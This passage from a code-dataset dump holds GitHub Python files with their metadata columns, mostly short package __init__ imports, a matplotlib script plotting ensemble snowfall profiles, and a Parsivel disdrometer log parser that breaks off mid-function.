onigiri/database/models/__init__.py
|
onigiri-team/core
|
27754e0379203e770dd6c9b998971c049b87608f
|
[
"Apache-2.0"
] | null | null | null |
from .invoice import Invoice
| 14.5
| 28
| 0.827586
| 4
| 29
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 29
| 1
| 29
| 29
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5fea509ac22ae9ab1b9c6728249562f033579d89
| 40
|
py
|
Python
|
news_buddy/api/v1/__init__.py
|
izacus/newsbuddy
|
f26e94f54bb8eeeb46fc48e697f6dd062607a7ea
|
[
"MIT"
] | null | null | null |
news_buddy/api/v1/__init__.py
|
izacus/newsbuddy
|
f26e94f54bb8eeeb46fc48e697f6dd062607a7ea
|
[
"MIT"
] | null | null | null |
news_buddy/api/v1/__init__.py
|
izacus/newsbuddy
|
f26e94f54bb8eeeb46fc48e697f6dd062607a7ea
|
[
"MIT"
] | null | null | null |
import query
import related
import stats
| 13.333333
| 14
| 0.875
| 6
| 40
| 5.833333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 40
| 3
| 15
| 13.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2731012bd4a51712d0c208738c7f22f2c8fd2fe9
| 57
|
py
|
Python
|
simplewebdavclient/__init__.py
|
btr1975/simplewebdavclient
|
c1e856545c722031fe69e00dadb57fbbc593e488
|
[
"MIT"
] | 1
|
2018-12-20T07:12:55.000Z
|
2018-12-20T07:12:55.000Z
|
simplewebdavclient/__init__.py
|
btr1975/simplewebdavclient
|
c1e856545c722031fe69e00dadb57fbbc593e488
|
[
"MIT"
] | null | null | null |
simplewebdavclient/__init__.py
|
btr1975/simplewebdavclient
|
c1e856545c722031fe69e00dadb57fbbc593e488
|
[
"MIT"
] | null | null | null |
from simplewebdavclient.simplewebdavclient import Client
| 28.5
| 56
| 0.912281
| 5
| 57
| 10.4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070175
| 57
| 1
| 57
| 57
| 0.981132
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
27389d0bc29351b7843e185c61fc6cf53baf98d7
| 13,957
|
py
|
Python
|
MEPS/plot_vertical.py
|
franzihe/Python_Masterthesis
|
f6acd3a98edb859f11c3f1cd2bc62e31065f5f4a
|
[
"MIT"
] | null | null | null |
MEPS/plot_vertical.py
|
franzihe/Python_Masterthesis
|
f6acd3a98edb859f11c3f1cd2bc62e31065f5f4a
|
[
"MIT"
] | null | null | null |
MEPS/plot_vertical.py
|
franzihe/Python_Masterthesis
|
f6acd3a98edb859f11c3f1cd2bc62e31065f5f4a
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# In[2]:
import sys
sys.path.append('/Volumes/SANDISK128/Documents/Thesis/Python/')
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.gridspec import GridSpec
import colormaps as cmaps
import save_fig as SF
import datetime
from datetime import date
# In[3]:
### Define colorbar colors
champ = 255.
blue = np.array([1,74,159])/champ # for the date
vert_col = np.array([197,197,197])/champ # vertical line for day marker
# In[4]:
def dates_plt(time_ml):
dt = []
dd = []
dm = []
dy = []
for i in range(0,time_ml.shape[0],6):
dt.append(datetime.datetime.utcfromtimestamp(time_ml[i]).hour)
dd.append(datetime.datetime.utcfromtimestamp(time_ml[i]).day)
dm.append(datetime.datetime.utcfromtimestamp(time_ml[i]).month)
dy.append(datetime.datetime.utcfromtimestamp(time_ml[i]).year)
xt = []
t1 = '%s-%s-%s' %(dy[0],dm[0],dd[0])
xt.append(t1)
for i in range(1,4):
xt.append('%s' %dt[i])
t2 = '%s-%s-%s' %(dy[4],dm[4],dd[4])
xt.append(t2)
for i in range(5,8):
xt.append('%s' %dt[i])
    if np.asarray(dt).size > 8:
        t3 = '%s-%s-%s' %(dy[8],dm[8],dd[8])
        xt.append(t3)
        # NOTE: in the original this next branch was an unreachable
        # `elif size > 9` (size > 9 already implies size > 8); nesting it
        # under the size > 8 case is the assumed intent.
        if np.asarray(dt).size > 9:
            for i in range(9,12):
                xt.append('%s' %dt[i])
return(xt);
# def dates_plt_18(time_ml):
# dt = []
# dd = []
# dm = []
# dy = []
# for i in range(0,time_ml.shape[0],6):
# dt.append(datetime.datetime.utcfromtimestamp(time_ml[i]).hour)
# dd.append(datetime.datetime.utcfromtimestamp(time_ml[i]).day)
# dm.append(datetime.datetime.utcfromtimestamp(time_ml[i]).month)
# dy.append(datetime.datetime.utcfromtimestamp(time_ml[i]).year)
#
#
# xt = []
# for i in range(0,1):
# xt.append('%s' %dt[i])
# t1 = '%s-%s-%s' %(dy[1],dm[1],dd[1])
# xt.append(t1)
# for i in range(2,5):
# xt.append('%s' %dt[i])
# t2 = '%s-%s-%s' %(dy[5],dm[5],dd[5])
# xt.append(t2)
# for i in range(6,9):
# xt.append('%s' %dt[i])
# if np.asarray(dt).size >9:
# t3 = '%s-%s-%s' %(dy[9],dm[9],dd[9])
# xt.append(t3)
# elif np.asarray(dt).size >10:
# for i in range(10,12):
# xt.append('%s' %dt[i])
# else:
# xt
# return(xt);
def dates_plt_00(h_p00, m_p00, d_p00, y_p00, ini_day ):
xt = []
t1 = '%s-%s-%s' %(y_p00[0][ini_day-1], m_p00[0][ini_day-1], d_p00[0][ini_day-1])
xt.append(t1)
for i in range(6,24,6):
xt.append('%s' %h_p00[i][ini_day-1])
t2 = '%s-%s-%s' %(y_p00[0][ini_day], m_p00[0][ini_day], d_p00[0][ini_day])
xt.append(t2)
for i in range(6,24,6):
xt.append('%s' %h_p00[i][ini_day])
t3 = '%s-%s-%s' %(y_p00[0][ini_day+1], m_p00[0][ini_day+1], d_p00[0][ini_day+1])
xt.append(t3)
return(xt);
def dates_plt_18(h_p18, m_p18, d_p18, y_p18, ini_day):
xt = []
for i in range(0,1):
xt.append('%s' %h_p18[i][ini_day-1])
t1 = '%s-%s-%s' %(y_p18[6][ini_day-1], m_p18[6][ini_day-1], d_p18[6][ini_day-1])
xt.append(t1)
for i in range(12,24,6):
xt.append('%s' %h_p18[i][ini_day-1])
for i in range(0,1):
xt.append('%s' %h_p18[i][ini_day])
t2 = '%s-%s-%s' %(y_p18[6][ini_day], m_p18[6][ini_day], d_p18[6][ini_day])
xt.append(t2)
for i in range(12,24,6):
xt.append('%s' %h_p18[i][ini_day])
for i in range(0,1):
xt.append('%s' %h_p18[i][ini_day+1])
return(xt);
levels = np.arange(0,0.6,0.02) # snowfall amount not divided by thickness
#levels = np.arange(0,9.5,0.32) # snowfall amount divided by thickness
# In[ ]:
def plot_vertical_EM0_1(time, height,result, time_ml, var_name, unit, maxim, Xmax, title):
fig = plt.figure(figsize=(20.,14.15))
gs = GridSpec(2, 2)
# title
fig.suptitle(title, y=0.95, color =blue, fontsize = 26)
for ens_memb in range(0,2):
if len(result[ens_memb]) == 0:
continue
### first 2 ens_memb
ax0 = plt.subplot(gs[ens_memb, :])
im0 = ax0.contourf(time[ens_memb], np.transpose(height[ens_memb]), result[ens_memb].T, levels,cmap=cmaps.viridis)
ax0.text(Xmax-0.5, Xmax+50, 'EM%s' %(ens_memb), # x, y
verticalalignment = 'bottom', horizontalalignment='right',
#transform = ax0.transAxes,
color = blue, fontsize = 22,
bbox={'facecolor':'white','alpha':.8, 'pad':1})
# set the limits of the plot to the limits of the data
ax0.axis([time[ens_memb].min(), Xmax, height[ens_memb].min(), 3000.])
# ax0.yaxis.grid()
# Vertical line to show end of day
ax0.axvline(24,color = vert_col, linewidth = 3)
ax0.axvline(48,color = vert_col, linewidth = 3)
# label ticks for plotting
dates = dates_plt(time_ml)
yl = [0., '' , 1.0, '' , 2., '' , 3.]
# labels
ax0.set_xticks(np.arange(0,Xmax+1,6))
if ens_memb == 1:
ax0.tick_params(axis='both',which='both',bottom='on',top='off',labelbottom='on',labelsize = 20)
ax0.set_xticklabels(dates, rotation = 25, fontsize = 20)
ax0.set_xlabel('time', fontsize = 22)
else:
ax0.tick_params(axis='both',which='both',bottom='on',top='off',labelbottom='off',labelsize = 20)
ax0.set_ylabel('height [km]', fontsize = 22)
ax0.set_yticks(np.arange(0,3500.,500.))
ax0.set_yticklabels(yl, fontsize = 20)
plt.subplots_adjust(hspace = 0.08)
# Add Colorbar
cbaxes = fig.add_axes([0.14, 0.03, .75, .02] ) #[left, bottom, width, height]
cbar = plt.colorbar(im0, orientation = 'horizontal', cax=cbaxes)
cbar.ax.set_xlabel('%s %s %s' %(var_name[0], var_name[1], unit), fontsize = 22)
cbar.ax.tick_params(labelsize = 20)
# In[ ]:
def plot_vertical_EM0_9(time, height,result, time_ml, var_name, unit, maxim, title):
fig = plt.figure(figsize=(14.15,20.))
gs = GridSpec(6, 2)
# title
fig.suptitle(title,y=0.9, color =blue, fontsize = 20)
#levels = np.arange(0,np.nanmax(maxim),0.015)
### first 2 ens_memb
for ens_memb in range(0,2):
if len(result[ens_memb]) == 0:
continue
ax0 = plt.subplot(gs[ens_memb, :])
im0 = ax0.contourf(time[ens_memb], np.transpose(height[ens_memb]), result[ens_memb].T, levels,cmap=cmaps.viridis)
ax0.text(time[ens_memb].max()-0.5, time[ens_memb].min()+50, 'EM%s' %(ens_memb), # x, y
verticalalignment = 'bottom', horizontalalignment='right',
#transform = ax0.transAxes,
color = blue, fontsize = 20,
bbox={'facecolor':'white','alpha':.8, 'pad':1})
# set the limits of the plot to the limits of the data
ax0.axis([time[ens_memb].min(), time[ens_memb].max(), height[ens_memb].min(), 3000.])
# ax0.yaxis.grid()
# Vertical line to show end of day
ax0.axvline(24,color = vert_col, linewidth = 3)
ax0.axvline(48,color = vert_col, linewidth = 3)
# label ticks for plotting
dates = dates_plt(time_ml)
yl = [0., '' , 1.0, '' , 2., '' , 3.]
# labels
ax0.set_xticks(np.arange(0,time[ens_memb].max()+1,6))
if ens_memb == 1:
ax0.tick_params(axis='both',which='both',bottom='on',top='off',labelbottom='on',labelsize = 16)
ax0.set_xticklabels(dates, rotation = 25, fontsize = 16)
# ax0.set_xlabel('time', fontsize = 20)
else:
ax0.tick_params(axis='both',which='both',bottom='on',top='off',labelbottom='off',labelsize = 16)
ax0.set_ylabel('height [km]', fontsize = 20)
ax0.set_yticks(np.arange(0,3500.,500.))
ax0.set_yticklabels(yl, fontsize = 16)
plt.subplots_adjust(hspace = 0.5)
# Add Colorbar
cbaxes = fig.add_axes([0.14, 0.03, .75, .02] ) #[left, bottom, width, height]
cbar = plt.colorbar(im0, orientation = 'horizontal', cax=cbaxes)
cbar.ax.set_xlabel('%s %s %s' %(var_name[0], var_name[1], unit), fontsize = 20)
cbar.ax.tick_params(labelsize = 18)
pos = []
pos.append(0)
pos.append(0)
for i in range(2,6):
pos.append(i)
pos.append(i)
### left column:
for ens_memb in range(2,10,2):
if len(result[ens_memb]) == 0:
continue
ax2 = plt.subplot(gs[pos[ens_memb], :-1])
im2 = ax2.contourf(time[ens_memb], np.transpose(height[ens_memb]), result[ens_memb].T, levels,cmap=cmaps.viridis)#, vmin=z_min, vmax=z_max)
ax2.text(time[ens_memb].max()-0.5, time[ens_memb].min()+50, 'EM%s' %(ens_memb), # x, y
verticalalignment = 'bottom', horizontalalignment='right',
#transform = ax0.transAxes,
color = blue, fontsize = 20,
bbox={'facecolor':'white','alpha':.8, 'pad':1})
# set the limits of the plot to the limits of the data
ax2.axis([time[ens_memb].min(), time[ens_memb].max(), height[ens_memb].min(), 3000.])
# ax2.yaxis.grid()
# Vertical line to show end of day
ax2.axvline(24,color = vert_col, linewidth = 3)
ax2.axvline(48,color = vert_col, linewidth = 3)
# label ticks for plotting
if np.asarray(dates).size <= 8.:
dates2 = [dates[0], '', '','',dates[4], '', '','']
else:
dates2 = [dates[0], '', '','',dates[4], '', '','',dates[8]]
# labels
ax2.set_xticks(np.arange(0,time[ens_memb].max()+1,6))
ax2.set_ylabel('height [km]', fontsize = 20)
ax2.set_yticks(np.arange(0,3500.,500.))
ax2.set_yticklabels(yl, fontsize = 18)
if ens_memb == 8:
ax2.tick_params(axis='both',which='both',bottom='on',top='off',labelbottom='on', labelsize = 16)
ax2.set_xticklabels(dates2, rotation = 25, fontsize = 16)
ax2.set_xlabel('time', fontsize = 20)
else:
ax2.tick_params(axis='both',which='both',bottom='on',top='off',labelbottom='off', labelsize = 16)
# right column
for ens_memb in range(3,10,2):
if len(result[ens_memb]) == 0:
continue
ax3 = plt.subplot(gs[pos[ens_memb], -1:])
im2 = ax3.contourf(time[ens_memb], np.transpose(height[ens_memb]), result[ens_memb].T, levels,cmap=cmaps.viridis)#, vmin=z_min, vmax=z_max)
ax3.text(time[ens_memb].max()-0.5, time[ens_memb].min()+50, 'EM%s' %(ens_memb), # x, y
verticalalignment = 'bottom', horizontalalignment='right',
#transform = ax0.transAxes,
color = blue, fontsize = 20,
bbox={'facecolor':'white','alpha':.8, 'pad':1})
# set the limits of the plot to the limits of the data
ax3.axis([time[ens_memb].min(), time[ens_memb].max(), height[ens_memb].min(), 3000.])
# ax3.yaxis.grid()
# Vertical line to show end of day
ax3.axvline(24,color = vert_col, linewidth = 3)
ax3.axvline(48,color = vert_col, linewidth = 3)
# label ticks for plotting
# labels
ax3.set_xticks(np.arange(0,time[ens_memb].max()+1,6))
ax3.set_ylabel('height [km]', fontsize = 20)
ax3.set_yticks(np.arange(0,3500.,500.))
ax3.set_yticklabels(yl, fontsize = 18)
if ens_memb == 9:
ax3.tick_params(axis='both',which='both',bottom='on',top='off',left = 'off',labelbottom='on', labelleft = 'off',labelsize = 16)
ax3.set_xticklabels(dates2, rotation = 25, fontsize = 16)
ax3.set_xlabel('time', fontsize = 20)
else:
ax3.tick_params(axis='both',which='both',bottom='on',top='off',left = 'off',labelbottom='off', labelleft = 'off',labelsize = 16)
# In[ ]:
def plot_vertical_EM0_9_48h(time, height,result, time_ml, var_name, unit, maxim, Xmax, title):
fig = plt.figure(figsize=(14.15,20.))
gs = GridSpec(10, 2)
# title
fig.suptitle(title, y =0.9, color =blue, fontsize = 20)
# levels = np.arange(0,np.nanmax(maxim),0.015)
for ens_memb in range(0,10):
if len(result[ens_memb]) == 0:
continue
### first all ens_memb
ax0 = plt.subplot(gs[ens_memb, :])
im0 = ax0.contourf(time[ens_memb], np.transpose(height[ens_memb]), result[ens_memb].T, levels,cmap=cmaps.viridis)
ax0.text(Xmax-0.5, Xmax+50, 'EM%s' %(ens_memb), # x, y
verticalalignment = 'bottom', horizontalalignment='right',
#transform = ax0.transAxes,
color = blue, fontsize = 20,
bbox={'facecolor':'white','alpha':.8, 'pad':1})
# set the limits of the plot to the limits of the data
ax0.axis([time[ens_memb].min(), Xmax, height[ens_memb].min(), 3000.])
# ax0.yaxis.grid()
# Vertical line to show end of day
ax0.axvline(24,color = vert_col, linewidth = 3)
ax0.axvline(48,color = vert_col, linewidth = 3)
# label ticks for plotting
dates = dates_plt(time_ml)
yl = [0., '' , 1.0, '' , 2., '' , 3.]
# labels
ax0.set_xticks(np.arange(0,Xmax+1,6))
if ens_memb == 9:
ax0.tick_params(axis='both',which='both',bottom='on',top='off',labelbottom='on',labelsize = 16)
ax0.set_xticklabels(dates, rotation = 25, fontsize = 16)
ax0.set_xlabel('time', fontsize = 20)
else:
ax0.tick_params(axis='both',which='both',bottom='on',top='off',labelbottom='off',labelsize = 16)
if ens_memb == 4:
plt.ylabel('height [km]', fontsize = 20)
# ax0.set_ylabel('height [km]', fontsize = 22)
ax0.set_yticks(np.arange(0,3500.,500.))
ax0.set_yticklabels(yl, fontsize = 16)
plt.subplots_adjust(hspace = 0.15)
# Add Colorbar
cbaxes = fig.add_axes([0.14, 0.03, .75, .02] ) #[left, bottom, width, height]
cbar = plt.colorbar(im0, orientation = 'horizontal', cax=cbaxes)
cbar.ax.set_xlabel('%s %s %s' %(var_name[0], var_name[1], unit), fontsize = 20)
cbar.ax.tick_params(labelsize = 18)
| 37.721622
| 147
| 0.580354
| 2,132
| 13,957
| 3.689024
| 0.105066
| 0.058741
| 0.030769
| 0.023776
| 0.882772
| 0.852893
| 0.821996
| 0.778258
| 0.739733
| 0.714177
| 0
| 0.065794
| 0.238805
| 13,957
| 369
| 148
| 37.823848
| 0.674511
| 0.179623
| 0
| 0.526786
| 0
| 0
| 0.053375
| 0.003882
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026786
| false
| 0
| 0.035714
| 0
| 0.0625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
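The MEPS/plot_vertical.py row above repeats one core trick in all of its dates_plt* helpers: converting unix model times into x-tick labels, where day boundaries get a full date and intermediate ticks get the bare hour. A standalone sketch of that trick; the hourly timestamps here are fabricated for illustration, not model output:

# Standalone illustration of the dates_plt() labelling trick.
import datetime
import numpy as np

time_ml = np.arange(0, 49) * 3600.0  # hourly unix times covering two days
labels = []
for i in range(0, time_ml.shape[0], 6):  # one label per 6 hours
    t = datetime.datetime.utcfromtimestamp(time_ml[i])
    if t.hour == 0:  # day boundary: write the full date, as in dates_plt()
        labels.append('%s-%s-%s' % (t.year, t.month, t.day))
    else:
        labels.append('%s' % t.hour)
print(labels)  # ['1970-1-1', '6', '12', '18', '1970-1-2', ...]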
27407c70c28a7909385ae9be2d1564b97aa83b11
| 33
|
py
|
Python
|
causalml/inference/tf/__init__.py
|
rainfireliang/causalml
|
d58024d8de4ab6136c5519949b58a22dd885df29
|
[
"Apache-2.0"
] | 2,919
|
2019-08-12T23:02:10.000Z
|
2022-03-31T21:59:34.000Z
|
causalml/inference/tf/__init__.py
|
rainfireliang/causalml
|
d58024d8de4ab6136c5519949b58a22dd885df29
|
[
"Apache-2.0"
] | 317
|
2019-08-13T14:16:22.000Z
|
2022-03-26T08:44:06.000Z
|
causalml/inference/tf/__init__.py
|
rainfireliang/causalml
|
d58024d8de4ab6136c5519949b58a22dd885df29
|
[
"Apache-2.0"
] | 466
|
2019-08-18T01:45:14.000Z
|
2022-03-31T08:11:53.000Z
|
from .dragonnet import DragonNet
| 16.5
| 32
| 0.848485
| 4
| 33
| 7
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 33
| 1
| 33
| 33
| 0.965517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
27f20d9e43549901130b7b59aa8b02c56957e94e
| 26
|
py
|
Python
|
data/__init__.py
|
myann/deeplearning-chf
|
1427cd8579a18ada6c8d1c99736143eac32ff38f
|
[
"MIT"
] | null | null | null |
data/__init__.py
|
myann/deeplearning-chf
|
1427cd8579a18ada6c8d1c99736143eac32ff38f
|
[
"MIT"
] | null | null | null |
data/__init__.py
|
myann/deeplearning-chf
|
1427cd8579a18ada6c8d1c99736143eac32ff38f
|
[
"MIT"
] | null | null | null |
from .base import Dataset
| 13
| 25
| 0.807692
| 4
| 26
| 5.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 26
| 1
| 26
| 26
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fd6982553a0966b9046c0b3a91795ae54a42fd7b
| 225
|
py
|
Python
|
tests/__init__.py
|
jlieberherr/learning-pt-routing
|
2ffd5de83f3b8864dbafb39630265c4686eb3e0a
|
[
"CC0-1.0"
] | 1
|
2021-03-11T01:18:30.000Z
|
2021-03-11T01:18:30.000Z
|
tests/__init__.py
|
jlieberherr/learning-pt-routing
|
2ffd5de83f3b8864dbafb39630265c4686eb3e0a
|
[
"CC0-1.0"
] | 3
|
2020-03-24T18:05:39.000Z
|
2021-08-23T20:36:21.000Z
|
tests/__init__.py
|
jlieberherr/learning-pt-routing
|
2ffd5de83f3b8864dbafb39630265c4686eb3e0a
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from scripts.helpers.my_logging import init_logging
from scripts.helpers.project_params import TESTS_OUTPUT_FOLDER, TESTS_LOG_NAME
init_logging(TESTS_OUTPUT_FOLDER, TESTS_LOG_NAME)
| 28.125
| 78
| 0.817778
| 34
| 225
| 5.058824
| 0.588235
| 0.127907
| 0.209302
| 0.255814
| 0.337209
| 0.337209
| 0
| 0
| 0
| 0
| 0
| 0.004854
| 0.084444
| 225
| 7
| 79
| 32.142857
| 0.830097
| 0.168889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fdb6a98e3be731ce87d12e45929c6f043f9dc3bc
| 23
|
py
|
Python
|
src/binding/pyct_icp/__init__.py
|
xiang-1208/ct_icp
|
42928e584c24595c49e147e2ea120f8cc31ec716
|
[
"MIT"
] | 123
|
2021-10-08T01:51:45.000Z
|
2022-03-31T08:55:15.000Z
|
src/binding/pyct_icp/__init__.py
|
ZuoJiaxing/ct_icp
|
1c371331aad833faec157c015fb8f72143019caa
|
[
"MIT"
] | 9
|
2021-10-19T07:25:46.000Z
|
2022-03-31T03:20:19.000Z
|
src/binding/pyct_icp/__init__.py
|
ZuoJiaxing/ct_icp
|
1c371331aad833faec157c015fb8f72143019caa
|
[
"MIT"
] | 23
|
2021-10-08T01:49:01.000Z
|
2022-03-24T15:35:07.000Z
|
from .pyct_icp import *
| 23
| 23
| 0.782609
| 4
| 23
| 4.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130435
| 23
| 1
| 23
| 23
| 0.85
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fdd4b31a5e79a3bbd57126dc121b9a9eb32d2cbe
| 102
|
py
|
Python
|
autoc/__init__.py
|
jaentrouble/image
|
5a9cc256bb8452bed0195950576d2b1f479b48cc
|
[
"MIT"
] | null | null | null |
autoc/__init__.py
|
jaentrouble/image
|
5a9cc256bb8452bed0195950576d2b1f479b48cc
|
[
"MIT"
] | null | null | null |
autoc/__init__.py
|
jaentrouble/image
|
5a9cc256bb8452bed0195950576d2b1f479b48cc
|
[
"MIT"
] | null | null | null |
import autoc.worker
import autoc.alphago_RFC
import autoc.marker
import autoc.texts
import autoc.tools
| 20.4
| 24
| 0.862745
| 16
| 102
| 5.4375
| 0.5
| 0.632184
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 102
| 5
| 25
| 20.4
| 0.935484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8bee176f47700fd77cd4816baaaa7b3ef324b720
| 16,367
|
py
|
Python
|
archive/parsivel_log_nc_convert.py
|
jdiasn/raincoat
|
b0249c88f1a5ca22a720285e87be4b06b67705b5
|
[
"MIT"
] | 1
|
2020-04-22T05:41:08.000Z
|
2020-04-22T05:41:08.000Z
|
archive/parsivel_log_nc_convert.py
|
jdiasn/raincoat
|
b0249c88f1a5ca22a720285e87be4b06b67705b5
|
[
"MIT"
] | null | null | null |
archive/parsivel_log_nc_convert.py
|
jdiasn/raincoat
|
b0249c88f1a5ca22a720285e87be4b06b67705b5
|
[
"MIT"
] | 4
|
2019-01-01T11:33:14.000Z
|
2021-01-04T20:34:43.000Z
|
import numpy as np
import datetime
import calendar
import matplotlib.mlab
matplotlib.use('Agg')
from netCDF4 import Dataset
import io
import collections
def time2unix(datestring):
try:
f = datetime.datetime.strptime(datestring,"%Y%m%d%H%M%S.%f")
unix = calendar.timegm(f.timetuple())
except ValueError:
unix = np.nan
return unix
def count_file_lines(fname, site):
if site == 'jue':
f = open(fname, 'r')
elif site == 'nya':
f = io.open(fname, 'r', encoding='ISO-8859-1')
line_total = sum(1 for line in f)
f.close()
return line_total
def readASCII_old(logfile): #valid for reading in .logs from Aug.2013 until April 17th,2015
#read .log-file:
dic = {}
colnames = ['unixtime',\
'rr','r_accum','wawa','z','vis','interval','amp','nmb','T_sensor',\
'serial_no','version',\
'curr_heating','volt_sensor',\
'status_sensor','station_name',\
'r_amount',\
'error_code',\
'n', 'v' ]
#0: datetime string, 1-9:float, 10,11:string, 12,13: float, 14,15: string, 16:float, 17:string
#check for bad lines to skip:
iline = 0
    filelen = count_file_lines(logfile, 'jue')  # NOTE: count_file_lines() requires a site; 'jue' assumed here, matching the plain open() this old reader uses below
rowlen = 570. # default for files!
#set keys where strings will be put in, to string arrays:
for k,key in enumerate(colnames):
if k == 10 or k == 11 or k == 14 or k == 15 or k == 17:
dic[key] = np.empty(filelen,dtype = 'S20')
elif k == 18 or k == 19:
dic[key] = np.zeros([32,filelen])
else:
dic[key] = np.nan * np.ones(filelen)
#read file:
f = open(logfile,'r')
for line in f: # for each line split up string, put value into corresponding array if rowlen normal.
line = line.strip()
cols = line.split(';')
#1/0
for i,cname in enumerate(colnames):
if len(line) == rowlen:
if i == 0:
#datetime = cols[i]
dic[cname][iline] = time2unix(cols[i])
elif i == 10 or i == 11 or i == 14 or i == 15 or i == 17: #all columns containing strings
dic[cname][iline] = str(cols[i])
elif i == 18:
for aa in range(32):
dic[cname][aa,iline] = float(cols[i+aa])
if dic[cname][aa,iline] == -9.999 : dic[cname][aa,iline] = np.nan
elif i == 19:
for aa in range(32):
dic[cname][aa,iline] = float(cols[50+aa])
if dic[cname][aa,iline] == -9.999 : dic[cname][aa,iline] = np.nan
else: dic[cname][iline] = float(cols[i])
dic['rr'][:] = dic['rr'][:]*60. #convert from mm/min to mm/h
iline += 1
f.close()
return dic
################################################################################
##############################################################################
def readASCII(logfile, site): #valid for reading in .logs later than April 17th,2015
#read .log-file:
dic = {}
colnames = ['unixtime',\
'rr','r_accum','wawa','z','vis','interval','amp','nmb','T_sensor',\
'serial_no','version',\
'curr_heating','volt_sensor',\
'status_sensor','station_name',\
'r_amount',\
'error_code',\
'n', 'v',
'M']
#0: datetime string, 1-9:float, 10,11:string, 12,13: float, 14,15: string, 16:float, 17:string, 18,19: array(32,filelen), 20: array(32,32,filelen)
#check for bad lines to skip:
iline = 0
filelen = count_file_lines(logfile, site)
# if site == 'jue':
# if int(logfile[-12:-4]) > 20160625 :
# rowlen = 4662.0 # Station name JOYCE
